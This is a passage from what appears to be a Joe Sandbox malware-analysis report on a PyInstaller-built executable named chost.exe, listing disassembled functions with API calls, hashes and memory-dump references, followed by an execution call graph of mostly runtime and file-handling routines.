                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7931D421619AC245EA319B32E8917AA7354EF84BE4F448279EE6DC77C9EF2CD605C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: Message
                                                                                                                                                                                                                                        • String ID: ERROR$Error$[PYI-%d:%ls]
                                                                                                                                                                                                                                        • API String ID: 2030045667-255084403
                                                                                                                                                                                                                                        • Opcode ID: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                        • Instruction ID: fffc2b012b497ff34626e6a0aed64a935c2a092e32d121183facd13d28b4fabf
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d0f77ace03032ad826a8cfca47aff52564341a40e7b1b64160a5aa56c6ce0663
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C921A372708B4291E7209B26F8857EA73A4EB88780F40813AEA8DD3756DE3CD649C700
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: FileWrite$ConsoleErrorLastOutput
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2718003287-0
                                                                                                                                                                                                                                        • Opcode ID: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                        • Instruction ID: abd8ef16a9b81290618f77638e7ac576d5da9cce812b5851d7f73eb9d09b65d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1ea6e931977968e7606fd026366deb17473f9f47aeaf25dd19fcfb7bb3399e1d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90D1E272B18A81CAE760CF76D4902AC37B1FB44798B44C279DE9E97B99DE38D006C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight$_isindst
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 4170891091-0
                                                                                                                                                                                                                                        • Opcode ID: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                        • Instruction ID: 8dc9b4cff8c900db3984dc338a7f4f5afe5aceefb2a42efb15c58efbdadee18a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4d98307b2f9efdc6516e3695475c092fba069f5f92b05f4e8f1f7e1348ba3a44
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3E51C172F08112CAEB38DB7699D16BC27A1FB40358F50827DDE5ED2AE5DF38A402C600
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: File$ErrorHandleInformationLastNamedPeekPipeType
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 2780335769-0
                                                                                                                                                                                                                                        • Opcode ID: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                        • Instruction ID: 00bf2e322935d1a5631d8eb15c954c4414da0139d4d9ff2793e7f56c777559d0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a0c598da5bacb08a65281ee6853743b6bc645484a6b27ddd69bc7d98502ecbe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 78513C32E08642CAFB28DF7294903BD23A1EB49B58F148579DE8D97A89DF38D441C740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: LongWindow$DialogInvalidateRect
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1956198572-0
                                                                                                                                                                                                                                        • Opcode ID: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                        • Instruction ID: 63d83a58b65f6a7f80efd341cc31b7d7991bd07e953fad8e29ae40335f5b7c24
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f66ec3ad31a24d6b03c6ecd933265a99c2c3f38e7b83c206d3886b5f9d1bb92
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4711E921A0C14782F66497BBE5C62796251EB88780F95C078EF5987B9ACD2DD491C600
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: _get_daylight$_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: ?
                                                                                                                                                                                                                                        • API String ID: 1286766494-1684325040
                                                                                                                                                                                                                                        • Opcode ID: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                        • Instruction ID: df73eabb44a2f06a033e4db1e3124a7c1a8e9c46c6ef0faa36ca5ae796876bb9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 49037f27f8a3fd0af602071961786b5c11050eb40cc6520dd4d88adff463e317
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8041D622A1868646FB789B379485379A6B0EB90BA4F14827DEE5CC6FD5DE3CD441CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        • _invalid_parameter_noinfo.LIBCMT ref: 00007FF6943790B6
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A9B8: RtlFreeHeap.NTDLL(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9CE
                                                                                                                                                                                                                                          • Part of subcall function 00007FF69437A9B8: GetLastError.KERNEL32(?,?,?,00007FF694382D92,?,?,?,00007FF694382DCF,?,?,00000000,00007FF694383295,?,?,?,00007FF6943831C7), ref: 00007FF69437A9D8
                                                                                                                                                                                                                                        • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF69436CC15), ref: 00007FF6943790D4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\chost.exe
                                                                                                                                                                                                                                        • API String ID: 3580290477-1415524421
                                                                                                                                                                                                                                        • Opcode ID: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                        • Instruction ID: 52cb32b1c6c69f5e76d711e043fd5b4d94f897f6066d3ac0390ffdf6535da869
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6949f310d66ea20a01752be9fefe254e5f7f697695929ffcc1b4329691481a3a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B2414A32A0CA12C6EB24AF3799C10B86395EF457D0B55817DE98D83B86EE3DE591C340
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ErrorFileLastWrite
                                                                                                                                                                                                                                        • String ID: U
                                                                                                                                                                                                                                        • API String ID: 442123175-4171548499
                                                                                                                                                                                                                                        • Opcode ID: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                        • Instruction ID: 35f69ef713e0ad9e874611a05a42db580df1e4f5096829ef7faab30f7096ebb7
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 476bd95e1daeb27f29af256220462f16043a6e728498dde3caabbd6ec9016d26
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7B418072B18A85C1DB208F36E4943A9A7A1FB88794F548039EE8DC7B98EF3CD441D740
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                        • API String ID: 1611563598-336475711
                                                                                                                                                                                                                                        • Opcode ID: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                        • Instruction ID: 20678e9c3187e8d8ec10a93006553312da1a69d06d30a569badd41888879584a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d6dc5ef3b9a701496246f0bbbe5215094a09db29d56a445c076fb19df1080212
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5C219172A1C682C2FB309B26D4C426D63A1FB88B48F95C07DDA8D83695DF7CE945CB41
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                                                        • API String ID: 2573137834-1018135373
                                                                                                                                                                                                                                        • Opcode ID: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                        • Instruction ID: 69f2f3c12087186f24af45d4eae6b35d6b51f5cb6cd45e42dc518d014c53c1a0
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4f0f6445cfedea8dceb7eb9436a550d57130d2c9509dbddfada5299d94659d4a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92112E32619B8282EB718F26F440259B7E5FB88B94F588274EB8D47769DF3CD551CB00
                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2391331452.00007FF694361000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF694360000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391291069.00007FF694360000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391376200.00007FF69438B000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF69439E000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391419544.00007FF6943A2000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2391492143.00007FF6943A4000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_7ff694360000_chost.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: DriveType_invalid_parameter_noinfo
                                                                                                                                                                                                                                        • String ID: :
                                                                                                                                                                                                                                        • API String ID: 2595371189-336475711
                                                                                                                                                                                                                                        • Opcode ID: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                        • Instruction ID: 881db87630076f0d7b2747036c5ec8d92c0139f5c5b3e50d5e61623f4bd89992
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 12447209ac998d916ea5af24bee96286b8310982615a7f3bb8f9e7bff02e83a7
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 82017C3291C20786FB70AB7294A627EB3A0EF44708F81807EE55DC6791EE2CE544CA14

                                                                                                                                                                                                                                        Execution Graph

                                                                                                                                                                                                                                        Execution Coverage:3.8%
                                                                                                                                                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                        Signature Coverage:0.2%
                                                                                                                                                                                                                                        Total number of Nodes:909
                                                                                                                                                                                                                                        Total number of Limit Nodes:85
                                                                                                                                                                                                                                        execution_graph 70840 7ff69437f9fc 70841 7ff69437fbee 70840->70841 70843 7ff69437fa3e _isindst 70840->70843 70887 7ff694374f78 11 API calls _get_daylight 70841->70887 70843->70841 70846 7ff69437fabe _isindst 70843->70846 70861 7ff694386204 70846->70861 70851 7ff69437fc1a 70897 7ff69437a970 IsProcessorFeaturePresent 70851->70897 70858 7ff69437fb1b 70860 7ff69437fbde 70858->70860 70886 7ff694386248 37 API calls _isindst 70858->70886 70888 7ff69436c5c0 70860->70888 70862 7ff694386213 70861->70862 70863 7ff69437fadc 70861->70863 70901 7ff694380348 EnterCriticalSection 70862->70901 70868 7ff694385608 70863->70868 70865 7ff69438621b 70866 7ff69438622c 70865->70866 70867 7ff694386074 55 API calls 70865->70867 70867->70866 70869 7ff694385611 70868->70869 70871 7ff69437faf1 70868->70871 70902 7ff694374f78 11 API calls _get_daylight 70869->70902 70871->70851 70874 7ff694385638 70871->70874 70872 7ff694385616 70903 7ff69437a950 37 API calls _invalid_parameter_noinfo 70872->70903 70875 7ff69437fb02 70874->70875 70876 7ff694385641 70874->70876 70875->70851 70880 7ff694385668 70875->70880 70904 7ff694374f78 11 API calls _get_daylight 70876->70904 70878 7ff694385646 70905 7ff69437a950 37 API calls _invalid_parameter_noinfo 70878->70905 70881 7ff694385671 70880->70881 70885 7ff69437fb13 70880->70885 70906 7ff694374f78 11 API calls _get_daylight 70881->70906 70883 7ff694385676 70907 7ff69437a950 37 API calls _invalid_parameter_noinfo 70883->70907 70885->70851 70885->70858 70886->70860 70887->70860 70889 7ff69436c5c9 70888->70889 70890 7ff69436c5d4 70889->70890 70891 7ff69436c950 IsProcessorFeaturePresent 70889->70891 70892 7ff69436c968 70891->70892 70908 7ff69436cb48 RtlCaptureContext RtlLookupFunctionEntry RtlVirtualUnwind 70892->70908 70894 7ff69436c97b 70909 7ff69436c910 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 70894->70909 70898 7ff69437a983 70897->70898 70910 7ff69437a684 14 API calls 3 library calls 70898->70910 70900 7ff69437a99e GetCurrentProcess TerminateProcess 70902->70872 70903->70871 70904->70878 70905->70875 70906->70883 70907->70885 70908->70894 70910->70900 70911 7ffdf708fa36 70912 7ffdf708fa69 70911->70912 70914 7ffdf708fa54 70911->70914 70912->70914 70915 7ffdf7075f20 70912->70915 70918 7ffdf7075f43 70915->70918 70916 7ffdf7076090 70916->70914 70918->70916 70919 7ffdf7071ed0 70918->70919 70920 7ffdf7071f34 70919->70920 70921 7ffdf7071eed 70919->70921 70924 7ffdf706a080 70920->70924 70921->70918 70922 7ffdf7071f45 70922->70918 70925 7ffdf706a0d5 70924->70925 70927 7ffdf706a0a2 70924->70927 70925->70927 70928 7ffdf7068000 70925->70928 70927->70922 70929 7ffdf706802f 70928->70929 70930 7ffdf706804c 70929->70930 70932 7ffdf705d970 70929->70932 70930->70927 70933 7ffdf705d99d 70932->70933 70938 7ffdf705d9eb 70932->70938 70934 7ffdf705d9d4 00007FFE0E142010 70933->70934 70935 7ffdf705d9b4 00007FFE0E142010 70933->70935 70934->70938 70937 7ffdf705d9b9 70935->70937 70936 7ffdf705da14 ReadFile 70936->70937 70936->70938 70937->70930 70938->70936 70938->70937 70939 7ffdf707d770 70941 7ffdf707d798 70939->70941 70940 7ffdf707d79f 70941->70940 70943 7ffdf7075b20 70941->70943 70944 7ffdf7075b6f 70943->70944 70945 7ffdf7075b36 70943->70945 70946 7ffdf7071ed0 3 API calls 70944->70946 70945->70941 70947 7ffdf7075bbd 70946->70947 70947->70941 70948 7ff694375698 70949 7ff6943756b2 70948->70949 70950 7ff6943756cf 70948->70950 70999 7ff694374f58 11 API calls _get_daylight 70949->70999 70950->70949 70952 7ff6943756e2 CreateFileW 70950->70952 70954 7ff69437574c 70952->70954 70955 7ff694375716 70952->70955 70953 7ff6943756b7 71000 7ff694374f78 11 API calls _get_daylight 70953->71000 71002 7ff694375c74 46 API calls 3 library calls 70954->71002 70973 7ff6943757ec GetFileType 70955->70973 70959 7ff694375751 70964 7ff694375755 70959->70964 70965 7ff694375780 70959->70965 70960 7ff6943756bf 71001 7ff69437a950 37 API calls _invalid_parameter_noinfo 70960->71001 70962 7ff69437572b CloseHandle 70967 7ff6943756ca 70962->70967 70963 7ff694375741 CloseHandle 70963->70967 71003 7ff694374eec 11 API calls 2 library calls 70964->71003 71004 7ff694375a34 70965->71004 70972 7ff69437575f 70972->70967 70974 7ff69437583a 70973->70974 70975 7ff6943758f7 70973->70975 70976 7ff694375866 GetFileInformationByHandle 70974->70976 71022 7ff694375b70 21 API calls _fread_nolock 70974->71022 70977 7ff694375921 70975->70977 70978 7ff6943758ff 70975->70978 70981 7ff694375912 GetLastError 70976->70981 70982 7ff69437588f 70976->70982 70979 7ff694375944 PeekNamedPipe 70977->70979 70997 7ff6943758e2 70977->70997 70978->70981 70983 7ff694375903 70978->70983 70979->70997 71025 7ff694374eec 11 API calls 2 library calls 70981->71025 70985 7ff694375a34 51 API calls 70982->70985 71024 7ff694374f78 11 API calls _get_daylight 70983->71024 70987 7ff69437589a 70985->70987 71015 7ff694375994 70987->71015 70988 7ff69436c5c0 _log10_special 8 API calls 70991 7ff694375724 70988->70991 70989 7ff694375854 70989->70976 70989->70997 70991->70962 70991->70963 70993 7ff694375994 10 API calls 70994 7ff6943758b9 70993->70994 70995 7ff694375994 10 API calls 70994->70995 70996 7ff6943758ca 70995->70996 70996->70997 71023 7ff694374f78 11 API calls _get_daylight 70996->71023 70997->70988 70999->70953 71000->70960 71001->70967 71002->70959 71003->70972 71006 7ff694375a5c 71004->71006 71005 7ff69437578d 71014 7ff694375b70 21 API calls _fread_nolock 71005->71014 71006->71005 71026 7ff69437f794 51 API calls 2 library calls 71006->71026 71008 7ff694375af0 71008->71005 71027 7ff69437f794 51 API calls 2 library calls 71008->71027 71010 7ff694375b03 71010->71005 71028 7ff69437f794 51 API calls 2 library calls 71010->71028 71012 7ff694375b16 71012->71005 71029 7ff69437f794 51 API calls 2 library calls 71012->71029 71014->70972 71016 7ff6943759bd FileTimeToSystemTime 71015->71016 71017 7ff6943759b0 71015->71017 71018 7ff6943759d1 SystemTimeToTzSpecificLocalTime 71016->71018 71021 7ff6943759b8 71016->71021 71017->71016 71017->71021 71018->71021 71019 7ff69436c5c0 _log10_special 8 API calls 71020 7ff6943758a9 71019->71020 71020->70993 71021->71019 71022->70989 71023->70997 71024->70997 71025->70997 71026->71008 71027->71010 71028->71012 71029->71005 71030 7ffdf6a68150 71031 7ffdf6a6816a 71030->71031 71032 7ffdf6a68180 71031->71032 71034 7ffdf6a4112c 71031->71034 71034->71032 71035 7ffdf6a4ef00 71034->71035 71038 7ffdf6a4ef30 71035->71038 71037 7ffdf6a4ef1a 71037->71032 71039 7ffdf6a41325 71038->71039 71040 7ffdf6a4ef50 SetLastError 71039->71040 71041 7ffdf6a4ef70 71040->71041 71044 7ffdf6a41c1c 71041->71044 71042 7ffdf6a4efac 71042->71037 71044->71042 71047 7ffdf6a86e20 71044->71047 71046 7ffdf6a86eec 71046->71042 71047->71046 71048 7ffdf6a41a0f 71047->71048 71048->71047 71051 7ffdf6a8ab70 71048->71051 71049 7ffdf6a414f1 SetLastError 71049->71051 71050 7ffdf6a8b8b6 71052 7ffdf6a8b8e1 00007FFE1FFB6570 71050->71052 71055 7ffdf6a8ace7 71050->71055 71051->71049 71051->71050 71051->71055 71053 7ffdf6a8b906 00007FFE1FFB6570 71052->71053 71052->71055 71054 